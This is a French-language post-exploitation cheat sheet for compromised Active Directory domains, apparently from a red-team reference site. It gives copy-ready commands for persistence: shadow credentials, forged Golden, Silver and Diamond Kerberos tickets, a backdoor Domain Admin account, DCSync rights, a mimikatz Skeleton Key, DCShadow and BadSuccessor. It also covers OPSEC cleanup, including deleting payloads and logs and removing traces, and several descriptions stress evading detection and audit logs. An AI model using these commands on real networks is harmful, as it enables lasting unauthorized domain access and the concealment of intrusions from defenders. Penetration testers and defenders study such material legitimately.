Post-Exploitation

Procedures & Cleanup

Persistance discrète et nettoyage OPSEC après compromission du domaine.

Persistance

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add shadowCredentials '$TARGET_USER'

Description: Shadow credentials : persistance discrète sur un compte, survit aux resets de mot de passe.

Copy command
ticketer.py -nthash $KRBTGT_HASH -domain-sid $DOMAIN_SID -domain $DOMAIN Administrator

Description: Golden Ticket : persistance maximale, valide 10 ans par défaut si krbtgt n'est pas changé.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add member 'Domain Admins' '$BACKDOOR_USER'

Description: Ajouter un compte backdoor aux Domain Admins : simple mais détectable par monitoring.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add dcsync '$BACKDOOR_USER'

Description: Donner les droits DCSync à un compte discret : backdoor qui ne requiert pas DA.

Copy command
ticketer.py -nthash $SERVICE_NTHASH -domain-sid $DOMAIN_SID -domain $DOMAIN -spn cifs/$TARGET $USER

Description: Silver Ticket : forge un TGS pour un service précis (cifs, http, mssql...) avec le hash du compte de service, sans jamais toucher le DC.

Copy command
ticketer.py -nthash $KRBTGT_HASH -aesKey $KRBTGT_AES -domain-sid $DOMAIN_SID -domain $DOMAIN -extra-pac -user-id 500 Administrator

Description: Diamond Ticket : modifie un TGT légitime intercepté plutôt que d'en forger un de zéro, plus discret face à la détection Golden Ticket classique (attributs cohérents avec un vrai TGT).

Copy command
mimikatz # privilege::debug; misc::skeleton

Description: Skeleton Key : patch LSASS sur le DC pour accepter un mot de passe universel en plus du vrai, pour tous les comptes du domaine. Ne survit pas à un reboot, à réinjecter si besoin.

Copy command
mimikatz # lsadump::dcshadow /object:$TARGET_USER /attribute:primaryGroupID /value:512

Description: DCShadow : enregistre temporairement l'hôte courant comme DC légitime (via RPC de réplication) pour pousser une modification qui contourne les ACL classiques et échappe aux logs d'audit AD standards.

Copy command
BadSuccessor.ps1 -Mode Exploit -DomainController $DC -Forest $DOMAIN -Credential $CRED -dMSA $DMSA_NAME -Target Administrator

Description: BadSuccessor (Windows Server 2025) : avec CreateChild sur une OU, créer un dMSA et forcer son attribut msDS-ManagedAccountPrecededByLink vers un compte cible fait hériter ses privilèges au premier Kerberos auth du dMSA, sans toucher au compte cible lui-même.

Nettoyage OPSEC

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove member '$GROUP' '$ATTACKER_USER'

Description: Se retirer des groupes sensibles après exploitation : réduire les traces évidentes.

Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS remove shadowCredentials '$TARGET_USER' --key-guid $GUID

Description: Supprimer les shadow credentials injectés après avoir obtenu l'accès voulu.

Copy command
nxc smb $TARGET -u $USER -p $PASS -x 'del C:\Temp\payload.exe && del C:\Temp\*.log'

Description: Supprimer les artefacts locaux : payloads, logs temporaires et autres fichiers.

Copy command
certipy template -u '$USER@$DOMAIN' -p $PASS -template $TEMPLATE -configuration $TEMPLATE_OLD

Description: Restaurer un template ADCS modifié après exploitation ESC4 : remettre l'état initial.